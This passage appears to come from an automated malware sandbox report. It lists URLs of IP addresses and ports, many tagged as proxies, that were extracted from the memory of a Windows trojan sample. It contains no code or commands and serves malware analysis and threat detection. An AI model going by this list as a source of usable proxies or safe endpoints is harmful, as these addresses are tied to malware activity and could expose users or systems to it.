                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64D0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.23.181:38817
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.23.181:38817://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.244.78
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.244.78://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.48.244.78:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.52.187.199:10000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.52.187.199:10000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.68.111.73:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.68.111.73:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.72.32.15:59605
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.72.32.15:59605://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.77.64.120:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.77.64.120:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.89.196.202:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.89.196.202:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.74.77
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7823000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.74.77://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C77F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.74.77:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C78F4000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.92.245.34:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C78B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.92.245.34:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.128.81.220:31623
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.128.81.220:31623://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.128.81.220:44286
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.128.81.220:44286://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.140.7.239:40009
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.140.7.239:40009://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAF30000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAF7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.188.81.57:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAF5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.188.81.57:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.189.191.184:48425
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.189.191.184:48425://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.28.152.111
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.28.152.111://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.28.152.111:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.28.152.113
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.28.152.113://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.28.152.113:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83FC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.37.40.1:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C82BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.37.40.1:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB346000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.38.108.195:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.38.108.195:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.38.93.22:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.38.93.22:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.38.93.2:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.38.93.2:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.47.103.89:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.47.103.89:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.47.35.35:3312
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.47.35.35:3312://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.47.96.120:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.47.96.120:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.10.114.97
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.10.114.97://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.10.114.97:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.101.37.78:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.101.37.78:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA5C0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA5A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.101.45.94:56921
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA5B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.101.45.94:56921://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.106.170.34:8989
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.106.170.34:8989://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.196.145:8081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.196.145:8081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.197.144:8081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.197.144:8081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.201.235:8081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.201.235:8081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.202.131:8081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.202.131:8081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.52.252:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.52.252:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C77F5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.121.31.86:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.121.31.86:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.122.230.20:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.122.230.20:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.124.77.148:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.124.77.148:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.132.192.13:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.132.192.13:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.203.245:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.203.245:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.204.161:10645
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.204.161:10645://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.204.161:11066
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.204.161:11066://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.204.161:13892
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.204.161:13892://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.204.161:30545
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.204.161:30545://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.204.161:31893
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.204.161:31893://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.204.161:32381
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.204.161:32381://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.204.161:32862
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.204.161:32862://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.204.161:33992
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.204.161:33992://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.204.235:10879
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.204.235:10879://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.204.235:30225
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.204.235:30225://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.36.165:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.137.36.165:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.143.187.58:1730
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.143.187.58:1730://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.143.187.58:17905
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.143.187.58:17905://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.143.187.58:38971
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.143.187.58:38971://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.143.187.58:55215
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.143.187.58:55215://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.143.187.58:59410
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.143.187.58:59410://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C808B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.174.188.153:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.174.188.153:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAFB9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.209.255.13:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAFB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.209.255.13:3128://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.150.195:26666
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.150.195:26666://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.60.44:5002
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.60.44:5002://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.6:11
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.6:11://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.6:20002
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.6:20002://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.6:2020
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.6:2020://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.6:7777
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.6:7777://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.6:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.6:8080://proxy
